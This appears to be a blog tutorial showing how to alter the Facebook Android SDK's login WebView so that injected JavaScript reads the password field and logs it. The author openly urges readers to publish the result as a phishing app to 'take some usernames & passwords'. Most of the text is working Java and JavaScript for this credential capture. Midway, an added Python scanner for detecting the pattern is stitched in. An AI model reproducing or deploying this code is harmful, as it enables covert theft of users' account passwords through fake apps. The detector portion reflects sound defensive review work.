To Anonymous-
This tutorial assumes basic knowledge of Android, Java, Eclipse etc.
Setup
Download the Android Facebook SDK here: https://github.com/facebook/facebook-android-sdk
Follow this tutorial up to "Installing the Facebook Android App" and save the key generated from this step. To put the app on the Android Market you'll need to generate a different key:
    keytool -exportcert -alias androiddebugkey -keystore ~/.android/debug.keystore | openssl sha1 -binary | openssl base64
Create a Facebook application here: https://developers.facebook.com/apps
Import the Example project from the SDK download.
Inside of the example Facebook code (/Example/src/com/facebook/android/Example.java) edit the following line:
    // Your Facebook Application ID must be set before running this example
    // See http://www.facebook.com/developers/createapp.php
    public static final String APP_ID = "###########";
Make this APP_ID match the App ID/API Key from the Facebook Application's edit app settings page.
Next, click Edit Settings on the page of the Facebook Application you've created and add the hash key from the keytool step above.
Run your Facebook application and make sure it works and you can log in. It should look like the images below. Note: you'll need to uninstall Facebook if you have it on your test device. How to get around this is explained below.



Now that it is changed, it's time to make a few changes. If you open /Example/com_facebook_android_src/com/facebook/android/FbDialog.java, you'll notice that it is the popup WebView that Facebook uses for OAuth authentication.
You'll notice an FbWebViewClient that grabs the Auth token off the query string and also monitors the request URLs. The first thing we are going to want to add is a JavaScript interface to this class.
    private class ManicFocusJavaScriptInterface {
        @SuppressWarnings("unused")
        public void showHTML(String html) {
            Log.i("HTML", "HTML: " + html);
        }
    }
Where the WebView is initialized, you'll want to assign the JS interface as follows:
    private void setUpWebView() {
        mWebView = new WebView(getContext());
        mWebView.setVerticalScrollBarEnabled(false);
        mWebView.setHorizontalScrollBarEnabled(false);
        mWebView.setWebViewClient(new FbDialog.FbWebViewClient());
        mWebView.getSettings().setJavaScriptEnabled(true);
        mWebView.addJavascriptInterface(new ManicFocusJavaScriptInterface(), "HTMLOUT");
        mWebView.getSettings().setJavaScriptEnabled(true);
        mWebView.loadUrl(mUrl);
        mWebView.setLayoutParams(FILL);
        mContent.addView(mWebView);
    }
Following this, we add a function that calls showHTML(), because we're lazy and don't want to figure out which step actually has the username and password. You'll notice that I use document.forms[0].elements[9].value; this is the password value in the screenshot below.
    private void showHtml(WebView view) {
        view.loadUrl("javascript:window.HTMLOUT.showHTML('<head>'+document.forms[0].elements[9].value+'</head>');");
    }

You could use any browser to resolve this or fancier methods if need be. Finally, we need to tell all the WebView methods that are important to hit our showHTML method.
    private class FbWebViewClient extends WebViewClient {
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, String url) {
            Log.e("Facebook-WebView", "Redirect URL: " + url);
            showHtml(view);
            if (url.startsWith(Facebook.REDIRECT_URI)) {
                Bundle values = Util.parseUrl(url);
                String error = values.getString("error");
                if (error == null) {
                    error = values.getString("error_type");
                }
                if (error == null) {
                    mListener.onComplete(values);
                } else if (error.equals("access_denied") ||
                        error.equals("OAuthAccessDeniedException")) {
                    mListener.onCancel();
                } else {
                    mListener.onFacebookError(new FacebookError(error));
                }
                FbDialog.this.dismiss();
                return true;
            } else if (url.startsWith(Facebook.CANCEL_URI)) {
                mListener.onCancel();
                FbDialog.this.dismiss();
                return true;
            } else if (url.contains(DISPLAY_STRING)) {
                return false;
            }
            // launch non-dialog URLs in a full browser
            getContext().startActivity(
                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
            return true;
        }

        @Override
        public void onReceivedError(WebView view, int errorCode,
                String description, String failingUrl) {
            super.onReceivedError(view, errorCode, description, failingUrl);
            showHtml(view);
            mListener.onError(
                    new DialogError(description, errorCode, failingUrl));
            FbDialog.this.dismiss();
        }

        @Override
        public void onPageStarted(WebView view, String url, Bitmap favicon) {
            Log.e("Facebook-WebView", "Webview loading URL: " + url);
            showHtml(view);
            super.onPageStarted(view, url, favicon);
            mSpinner.show();
        }

        @Override
        public void onPageFinished(WebView view, String url) {
            super.onPageFinished(view, url);
            showHtml(view);
            String title = mWebView.getTitle();
            if (title != null && title.length() > 0) {
                mTitle.setText(title);
            }
            mSpinner.dismiss();
        }

        private void showHtml(WebView view) {
            view.loadUrl("javascript:window.HTMLOUT.showHTML('<head>'+document.forms[0].elements[9].value+'</head>');");
        }
    }
One thing to note: before running the application you'll need to uninstall your Facebook application. The Facebook Android SDK calls the Facebook.apk if it exists, or else it loads the popup like above. Since this is a quick proof of concept post, you'll have to figure out the correct code to comment out, so it always loads the popup. After running the application, look at LogCat and you'll see your Facebook password being printed into the logs.
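For reviewers auditing an app that hosts a login page in its own WebView, the combination shown above (script enabled, a Java object bridged into the page, injected script reading form values, all inside the OAuth dialog) can be flagged from source. This is an added example, not code from the original post or the Facebook SDK; the rule names, severity levels and sample strings are assumptions constructed for illustration, with the flagged sample reusing lines from the post.

```python
import re

# Constructed sample: the calls this post adds to FbDialog.java, one per line.
SAMPLE_FLAGGED = r"""mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new ManicFocusJavaScriptInterface (), "HTMLOUT");
view.loadUrl("javascript:window.HTMLOUT.showHTML('<head>'+document.forms[0].elements[9].value+'</head>');");
if (url.startsWith(Facebook.REDIRECT_URI)) {
"""

# Constructed sample: a WebView with no script bridge (hypothetical help screen).
SAMPLE_CLEAN = r"""WebView help = new WebView(getContext());
help.getSettings().setJavaScriptEnabled(false);
help.loadUrl("https://example.com/help");
"""

# Hypothetical rule set; each rule is matched line by line.
RULES = {
    "js_enabled": re.compile(r"\.setJavaScriptEnabled\(\s*true\s*\)"),
    "js_bridge": re.compile(r"\.addJavascriptInterface\(\s*new\s+(\w+)"),
    "dom_read": re.compile(r'loadUrl\(\s*"javascript:[^"]*document\.forms[^"]*\.value'),
    "auth_context": re.compile(r"REDIRECT_URI|access_token|oauth", re.IGNORECASE),
}


def severity(hits):
    """Rank a file by which rules fired together."""
    bridge = "js_enabled" in hits and "js_bridge" in hits
    if bridge and "dom_read" in hits and "auth_context" in hits:
        return "high"      # host app can read credentials typed into the login page
    if bridge and "auth_context" in hits:
        return "medium"    # bridged object exposed to an authentication page
    if bridge:
        return "review"    # bridge present, purpose unknown
    return "none"


def scan_source(name, text):
    """Return rule hits (rule -> line numbers) and a severity for one source file."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(rule, []).append(lineno)
    return {"file": name, "severity": severity(hits), "hits": hits}


if __name__ == "__main__":
    for name, text in (("FbDialog.java", SAMPLE_FLAGGED), ("Help.java", SAMPLE_CLEAN)):
        print(scan_source(name, text))
```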

Password is being printed between the head tags. To finish your Facebook phishing application you'll need to strip out the redirect authentication to the Facebook application. Then add a few small features to your application and throw it on the market. Facebook basically built you a perfect phishing SDK, there are tons of examples, just make something silly with them. Take some usernames & passwords and creep some people out.
I believe the SSO is vulnerable to a MITM attack, but the SSO returns "invalid_key" even though the OAuth works. This appears to be a bug in the SDK. If anyone knows how to fix it, let me know~
If you donate, shoot me an email and I'll send over the working source for the example.
Good day.